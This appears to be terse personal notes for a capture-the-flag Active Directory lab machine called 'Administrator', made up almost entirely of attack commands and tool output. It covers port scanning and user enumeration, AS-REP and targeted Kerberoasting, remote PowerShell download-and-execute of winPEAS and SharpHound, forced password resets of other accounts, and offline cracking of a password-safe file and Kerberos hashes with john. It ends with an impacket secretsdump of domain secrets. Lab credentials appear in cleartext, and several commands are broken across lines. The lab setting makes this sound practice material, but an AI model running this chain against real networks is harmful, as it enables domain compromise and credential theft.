Select a result to preview

Administrator

Username: Olivia
Password: ichliebedich

sudo nmap 10.10.11.42 -sS -vvv -Pn -n -p- --min-rate 5000 --open -oG allPorts

sudo nmap 10.10.11.42 -p PORTS -sCV -oN targeted

ftp 10.10.11.42
anonymous

rpcclient -U 'Olivia%ichliebedich' 10.10.11.42

Administrator
Guest
krbtgt
olivia
michael
benjamin
emily
ethan
alexander
emma

nxc smb 10.10.11.42

impacket-GetNPUsers administrator.htb/ -no-pass -usersfile validUsers.txt


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User olivia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User benjamin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ethan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

impacket-GetUserSPNs administrator.htb/Olivia:ichliebedich -request


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName                           Name     MemberOf                                                       PasswordLastSet             LastLogon                   Delegation 
---------------------------------------------  -------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
administrator/Michael.administrator.htb:60011  michael  CN=Remote Management Users,CN=Builtin,DC=administrator,DC=htb  2025-03-15 02:03:06.701243  2025-03-15 02:18:58.873119  

ldapdomaindump -u 'administrator.htb\Olivia' -p 'ichliebedich' 10.10.11.4

evil-winrm -i 10.10.11.42 -u Olivia -p "ichliebedich"

IEX(New-Object Net.WebClient).downloadString('http://10.10.11.42:8000/winPEAS.ps1')

netstat -ano | FindStr /I "LISTENING"

IEX(New-Object Net.WebClient).downloadString('http://10.10.11.42:8000/winPEAS.ps1')

IEX(New-Object Net.WebClient).downloadString('http://10.10.11.42:8000/SharpHound.ps1')

certutil -urlcache -f http://10.10.14.200:8000/SharpHound.exe SharpHound.exe

bloodhound-python  -d administrator.htb -ns 10.10.11.42 -u olivia -p ichliebedich -c All --zip

net user michael michael /domain

evil-winrm -i 10.10.11.42 -u michael -p "michael"

rpcclient -U michael 10.10.11.42

setuserinfo2 benjamin 23 'benjamin'

net rpc password "benjamin" -U "administrator.htb"/michael%michael -S "10.10.11.42"

ftp 10.10.11.42

benjamin
benjamin

wget ftp://benjamin:benjamin@10.10.11.42/Backup.psafe3

pwsafe2john Backup.psafe3

john hash

tekieromucho

UXLCI5iETUsIBoFVTj8yQFKoHjXmb

evil-winrm -i 10.10.11.42 -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -i administrator.htb

Set-ADUser -Identity ethan -Add @{servicePrincipalName="foobar/xd"}

$SecPassword = ConvertTo-SecureString '
UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force

$Cred = New-Object System.Management.Au
tomation.PSCredential('object.local\ethan', $SecPassword)

Get-DomainSPNTicket -SPN "foobar/xd" -C
redential $Cred

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

limpbizkit

impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42